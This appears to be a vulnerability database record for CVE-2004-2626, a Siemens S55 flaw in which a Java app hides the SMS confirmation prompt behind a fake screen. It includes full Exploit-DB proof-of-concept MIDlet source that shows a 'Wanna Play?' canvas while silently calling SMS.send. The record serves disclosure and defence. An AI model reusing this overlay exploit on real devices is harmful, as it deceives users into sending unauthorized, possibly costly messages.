ID: OSVDB:5703
Type: osvdb
Reporter: FtR(ftr@phenoelit.de), FX(fx@phenoelit.de)
Modified: 2004-04-27T17:47:07
Description
Vulnerability Description
Siemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirming an SMS message prompt, granting the application the ability to send arbitrary messages.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
Siemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirming an SMS message prompt, granting the application the ability to send arbitrary messages.
{"edition": 1, "title": "Siemens S55 SMS Send Prompt Bypass Weakness", "bulletinFamily": "software", "published": "2004-04-27T17:47:07", "lastseen": "2017-04-28T13:20:00", "history": [], "modified": "2004-04-27T17:47:07", "reporter": "FtR(ftr@phenoelit.de), FX(fx@phenoelit.de)", "hash": "c79155f7f6f97febbe5865de08adad8dc084cdadb32d0b1d10b4c52645b4a44a", "viewCount": 1, "href": "https://vulners.com/osvdb/OSVDB:5703", "description": "## Vulnerability Description\nSiemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirmimg an SMS message prompt, granting the application the ability to send arbitrary messages.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nSiemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirmimg an SMS message prompt, granting the application the ability to send arbitrary messages.\n## References:\nSecurity Tracker: 1009959\n[Secunia Advisory ID:11492](https://secuniaresearch.flexerasoftware.com/advisories/11492/)\nOther Advisory URL: http://lists.netsys.com/pipermail/full-disclosure/2004-April/020557.html\nGeneric Informational URL: http://lists.netsys.com/pipermail/full-disclosure/2004-April/020661.html\n[CVE-2004-2626](https://vulners.com/cve/CVE-2004-2626)\nBugtraq ID: 10227\n", "affectedSoftware": [{"name": "S55", "version": "09.2179+", "operator": "eq"}], "type": "osvdb", "hashmap": [{"key": "affectedSoftware", "hash": "a333779b45310290f24aac90a3d93c55"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "0c0102786e4950debce3e021a1b3d251"}, {"key": "cvss", "hash": "c306a62a6624d073fa0f285006558cae"}, {"key": 
"description", "hash": "266c5495b80b857a8383c9ccae6844d9"}, {"key": "href", "hash": "b6e7c6f047007c392ab5da02cc34907f"}, {"key": "modified", "hash": "878d8449b95e9f7443c6923a9a9f2fa5"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "878d8449b95e9f7443c6923a9a9f2fa5"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "433ec5d105c43c8b9d32f6d5d7350171"}, {"key": "title", "hash": "27747587c9b6855a96bffe6644852771"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-2626"]}, {"type": "exploitdb", "idList": ["EDB-ID:24065"]}], "modified": "2017-04-28T13:20:00"}, "vulnersScore": 5.0}, "cvss": {"vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 3.7}, "cvelist": ["CVE-2004-2626"], "id": "OSVDB:5703"}
{"cve": [{"lastseen": "2017-07-20T10:48:43", "bulletinFamily": "NVD", "description": "GUI overlay vulnerability in the Java API in Siemens S55 cellular phones allows remote attackers to send unauthorized SMS messages by overlaying a confirmation message with a malicious message.", "modified": "2017-07-19T21:29:02", "published": "2004-12-31T00:00:00", "id": "CVE-2004-2626", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2626", "title": "CVE-2004-2626", "type": "cve", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T22:26:35", "bulletinFamily": "exploit", "description": "Siemens S55 Cellular Telephone SMS Confirmation Message Bypass Vulnerability. CVE-2004-2626. Remote exploit for hardware platform", "modified": "2004-04-27T00:00:00", "published": "2004-04-27T00:00:00", "id": "EDB-ID:24065", "href": "https://www.exploit-db.com/exploits/24065/", "type": "exploitdb", "title": "Siemens S55 Cellular Telephone Sms Confirmation Message Bypass Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/10227/info\r\n\r\nReportedly the Siemens S55 is affected by an SMS confirmation message bypass vulnerability. 
This issue is due to a race condition error that allows a malicious programmer to send SMS messages from unsuspecting cellular telephone user's telephones while obscuring the confirmation request.\r\n\r\nThis issue may allow a malicious programmer to develop an application that can send SMS messages without the cellular telephone user's knowledge.\r\n\r\n package hello;\r\n import javax.microedition.lcdui.*;\r\n import javax.microedition.midlet.*;\r\n import com.siemens.mp.game.Sound;\r\n import com.siemens.mp.gsm.*;\r\n import java.lang.*;\r\n import java.io.*;\r\n\r\n public class hello extends MIDlet implements CommandListener\r\n {\r\n static final String EXIT_COMMAND_LABEL = \"Exit FtRs world\";\r\n Display display;\r\n static hello hello;\r\n\r\n public void startApp (){\r\n HelloCanva kanvas = new HelloCanva();\r\n Scr2 scr2 = new Scr2();\r\n display = Display.getDisplay(this);\r\n // Menu\r\n Command exitCommand = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);\r\n scr2.addCommand(exitCommand);\r\n scr2.setCommandListener(this);\r\n //Data\r\n\r\n // screen 1\r\n display.setCurrent(kanvas);\r\n mycall();\r\n // screen 2\r\n display.setCurrent(scr2);\r\n //destroyApp(false);\r\n }\r\n\r\n public void mycall(){\r\n\r\n String SMSstr= \"Test\";\r\n\r\n try {\r\n /* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/\r\n SMS.send(\"0170-Numder\", SMSstr);\r\n }\r\n /* Exception handling */\r\n catch (com.siemens.mp.NotAllowedException ex) {\r\n // Some handling code ...\r\n }\r\n catch (IOException ex) {\r\n //Some handling code ...\r\n }\r\n catch (IllegalArgumentException ex) {\r\n // Some handling code ...\r\n }\r\n } //public viod call()\r\n\r\n protected void destroyApp (boolean b){\r\n display.setCurrent(null);\r\n this.notifyDestroyed(); // notify KVM\r\n }\r\n\r\n protected void pauseApp ()\r\n { }\r\n\r\n public void commandAction (Command c, Displayable d){\r\n destroyApp(false);\r\n }\r\n\r\n }\r\n\r\n class HelloCanva extends Canvas\r\n {\r\n 
public void paint (Graphics g)\r\n {\r\n String str = new String(\"Wanna Play?\");\r\n g.setColor(0,0,0);\r\n g.fillRect(0, 0, getWidth(), getHeight());\r\n g.setColor(255,0,0);\r\n g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);\r\n g.drawString(\"yes\", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);\r\n g.drawString(\"no\", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);\r\n }\r\n }\r\n class Scr2 extends Canvas\r\n {\r\n public void paint (Graphics g) {\r\n String str = new String(\"cool\");\r\n g.setColor(0,0,0);\r\n g.fillRect(0, 0, getWidth(), getHeight());\r\n g.setColor(255,0,0);\r\n g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);\r\n }\r\n }", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24065/"}]}